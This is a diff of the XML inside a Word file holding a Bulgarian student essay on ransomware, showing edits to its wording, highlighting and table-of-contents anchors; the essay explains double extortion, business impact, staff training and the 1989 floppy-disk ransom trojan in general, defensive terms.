-          <w:hyperlink w:anchor="_Toc223468476" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545532" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1686,7 +1686,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468476 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545532 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1726,16 +1726,16 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468477" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545533" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Жертвата е заплатила откупа:</w:t>
+              <w:t>Потърпевшият е заплатил откупа:</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1756,7 +1756,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468477 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545533 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1796,10 +1796,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468478" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545534" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1834,7 +1834,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468478 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545534 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1874,10 +1874,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468479" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545535" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1912,7 +1912,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468479 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545535 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1953,10 +1953,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468480" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545536" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1968,7 +1968,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2013,7 +2013,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468480 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545536 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2054,10 +2054,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468481" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545537" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2070,7 +2070,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2100,7 +2100,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468481 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545537 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2141,10 +2141,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468482" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545538" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2156,7 +2156,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2186,7 +2186,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468482 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545538 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2227,10 +2227,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468483" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545539" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2243,7 +2243,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2281,7 +2281,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468483 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545539 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2322,10 +2322,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468484" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545540" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2338,7 +2338,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2376,7 +2376,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468484 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545540 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2416,10 +2416,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468485" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545541" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2461,7 +2461,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468485 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545541 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2501,10 +2501,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223468486" w:history="1">
+          <w:hyperlink w:anchor="_Toc223545542" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2531,7 +2531,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223468486 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223545542 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2594,7 +2594,7 @@
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223468464"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc223545520"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -2613,23 +2613,59 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>Рансъмуерът</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">е вид зловреден софтуер, който криптира файлове и ограничава достъпа до дадена система. Хакерът изисква откуп от ощетения, обикновено парична сума (в биткойн), в замяна откраднатите данни. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Най-често се използва биткойн или друга криптовалута, понеже е много трудна да бъде проследена. </w:t>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t> е вид зловреден софтуер, който криптира файлове</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и ограничава достъпа до дадена система. Хакерът изисква откуп от</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> потърпевшия</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, обикновено парична сума (в биткойн), в замяна </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ощетения си възвръща </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">откраднатите данни. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Най-често се използва биткойн или друга криптовалута, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">тъй като </w:t>
+      </w:r>
+      <w:r>
+        <w:t>е трудн</w:t>
+      </w:r>
+      <w:r>
+        <w:t>о</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> да бъде проследена. </w:t>
       </w:r>
       <w:r>
         <w:t>Ако жертвата откаже да заплати, всички файлове ще бъдат унищожени.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Дори потребителят да заплати сумата не е сигурно, че хакерът няма да изтрие всичко въпреки това.</w:t>
+        <w:t xml:space="preserve"> Дори потребителят да заплати сумата не е сигурно, че хакерът няма да </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ги </w:t>
+      </w:r>
+      <w:r>
+        <w:t>изтрие.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -2641,7 +2677,25 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">В зависимост от открадната информация, жертвата може да бъде притиснат допълнително, като бъде заплашван, че цялата му лична информация ще бъде разпространена в интернет – местожителство, членове на семейство, </w:t>
+        <w:t>В зависимост от открадната информация,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> потърпевшият</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> може да бъде заплаш</w:t>
+      </w:r>
+      <w:r>
+        <w:t>е</w:t>
+      </w:r>
+      <w:r>
+        <w:t>н, че лична</w:t>
+      </w:r>
+      <w:r>
+        <w:t>та му</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> информация ще бъде разпространена в интернет – местожителство, членове на семейство, </w:t>
       </w:r>
       <w:r>
         <w:t>банкова информация, документи, фирмена информация, работно място</w:t>
@@ -2653,107 +2707,227 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>и др</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. Прилагането на двете тактики </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">заедно </w:t>
-      </w:r>
-      <w:r>
-        <w:t>е известно като</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>„</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">double extortion”. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Колкото е по-силен мотивът, толкова е по-вероятно потърпевшият да се пречупи. Друга тактика, която често се прилага е блъф, хакерът има частичен достъп до дадена система, но е неспособен да й навреди. Тогава хвърля безпочвени закани и разчита потребителя да изпълни наредбите.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Тези атаки с изнудващ зловреден софтуер (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) могат сериозно да нарушат бизнес процесите. Организациите често губят достъп до важна информация, необходима за нормалната им работа и предоставяне на критични услуги.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Икономическите и щети </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">по репутацията </w:t>
-      </w:r>
-      <w:r>
-        <w:t>са значителни. Възстановяването след подобна атака е трудно и скъпо. Засегнати могат да бъдат организации от всякакъв мащаб. Последиците се усещат както п</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>о време на първоначалното прекъсване, така и дълго след това.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">и </w:t>
+      </w:r>
+      <w:r>
+        <w:t>т.н</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="708"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">От съществено значение е, компаниите често да прилагат задължителни обучение на служителите си, понеже </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Откуп, комбиниран с злоупотреба с лични данни се нарича</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>„</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">double extortion”. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Колкото е по-силен мотивът, толкова е по-вероятно потърпевшият да се пречупи. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Друга тактика, която често се прилага е блъф</w:t>
+      </w:r>
+      <w:r>
+        <w:t>иране. Киберпрестъпникът</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> има частичен достъп до дадена система, но е неспособен да й навреди. Тогава </w:t>
+      </w:r>
+      <w:r>
+        <w:t>отправя</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> безпочвени закани и разчита потребителя</w:t>
+      </w:r>
+      <w:r>
+        <w:t>т</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> да изпълни </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>наредбите</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Тези атаки с изнудващ зловреден софтуер (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:t>ransomware</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) могат сериозно да нарушат бизнес процесите. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Компаниите</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> губят достъп до важна информация, необходима за нормалн</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ия работен процес и </w:t>
+      </w:r>
+      <w:r>
+        <w:t>предоставяне на к</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">онкретни </w:t>
+      </w:r>
+      <w:r>
+        <w:t>услуги.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Икономическите  щети</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> за фирмите</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>са значи</w:t>
+      </w:r>
+      <w:r>
+        <w:t>м</w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, а в</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ъзстановяването </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">на репутацията </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">след подобна атака е трудно и скъпо. Засегнати могат да бъдат организации от всякакъв мащаб. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Последиците се усещат както по време на първоначалното прекъсване, така и дълго след това.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>К</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">омпаниите </w:t>
+      </w:r>
+      <w:r>
+        <w:t>трябва</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> да </w:t>
+      </w:r>
+      <w:r>
+        <w:t>провеждат з</w:t>
+      </w:r>
+      <w:r>
+        <w:t>адължителни обучени</w:t>
+      </w:r>
+      <w:r>
+        <w:t>я</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на служителите си, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">тъй като </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nsomware</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> може да бъде свален през имейл, </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>attachments,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> реклами, линкове, уеб страници с вложени злокачествени софтуери. В реферата, ще бъдат разгледани стратегии и защити от </w:t>
+        <w:t>прикачени файлове</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> реклами, линкове, уеб страници с вложени злокачествени софтуери. В </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>реферата</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, ще бъдат разгледани стратегии и защити от </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2872,7 +3046,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223468465"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc223545521"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -2896,22 +3070,71 @@
         <w:tab/>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t xml:space="preserve">Въпреки че </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Ransomware</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> е нашумял последните 10 години, идеята за </w:t>
-      </w:r>
-      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> е </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>популярен</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> последните 10 години, идеята за </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>кражба</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> на потребителска информация или за заложник чрез криптиране на файлове, отграничаване на достъпа или чрез други методи и по-късно откуп е доста стара.</w:t>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> на потребителска информация</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ограничаване на достъпа </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">и изискване на откуп </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>е доста стара.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2920,7 +3143,43 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>В края на 80-те години, престъпниците са можели да криптират файлове и са искали валута изпратена през пощенски услуги за откуп. Една от първите документирани</w:t>
+        <w:t xml:space="preserve">В края на 80-те години, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>кибер</w:t>
+      </w:r>
+      <w:r>
+        <w:t>престъпниците са криптира</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ли</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> файлове и са искали </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">откуп в долари, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>изпратен</w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>по</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> пощ</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ата. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Една от първите документирани</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2965,7 +3224,37 @@
         <w:t>”.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Разпространяван е чрез флопи дискети през 1989 година. Потърпевшите са накарани да изпратят 189$ през пощенска кутия в Панама, за да възстановят достъпа до системите си, въпреки че методът за криптирани е бил сравнително прост – чрез симетрично криптиране. Симетричното криптиране  е техника, където един и същи ключ се използва за криптиране и декриптиране на данните. </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Троянският кон е раз</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">пространяван чрез флопи дискети през 1989 година. Потърпевшите са </w:t>
+      </w:r>
+      <w:r>
+        <w:t>принудени д</w:t>
+      </w:r>
+      <w:r>
+        <w:t>а изпратят 189$ през пощенска кутия в Панама, за да възстановят достъпа до системите си</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. М</w:t>
+      </w:r>
+      <w:r>
+        <w:t>етодът за криптиран</w:t>
+      </w:r>
+      <w:r>
+        <w:t>е</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е бил сравнително прост – чрез симетрично криптиране. Симетричното криптиране  е техника, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>при която</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> един и същи ключ се използва за криптиране и декриптиране на данните. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2982,10 +3271,64 @@
         <w:t>Ransomware</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> става широко разпространен чак през ранните две хилядни</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – вероятно поради трудността хакера да си получи откупа. Появата на биткойна и криптовалутите променят това. Лесен и удобен начин е за получаване на крупната сума от потърпевшия като остават незабелязани. При традиционното банкиране участниците са ясно идентифицирани – име, банка, държава, регулации и т.н. При криптовалутите адрес на сметката не съдържа директна лична информация. Липсва и централизиран контролен орган. Преводите са почти невъзможни да бъдат спрени, замразени, върнати или проследени от институциите.  Изпирането на валутата е сравнително лесно – чрез т.нар. </w:t>
+        <w:t xml:space="preserve"> става широко разпространен </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">от 2000 г. до настоящия момент. Преди 2000 г. киберпрестъпниците са имали затруднения при получаването на откуп. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Появата на биткойна и криптовалутите променят това. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Криптовалутите са л</w:t>
+      </w:r>
+      <w:r>
+        <w:t>есен и удобен начин за получаване на крупната сума от потърпевшия</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, тъй като са трудно проследими.</w:t>
+      </w:r>
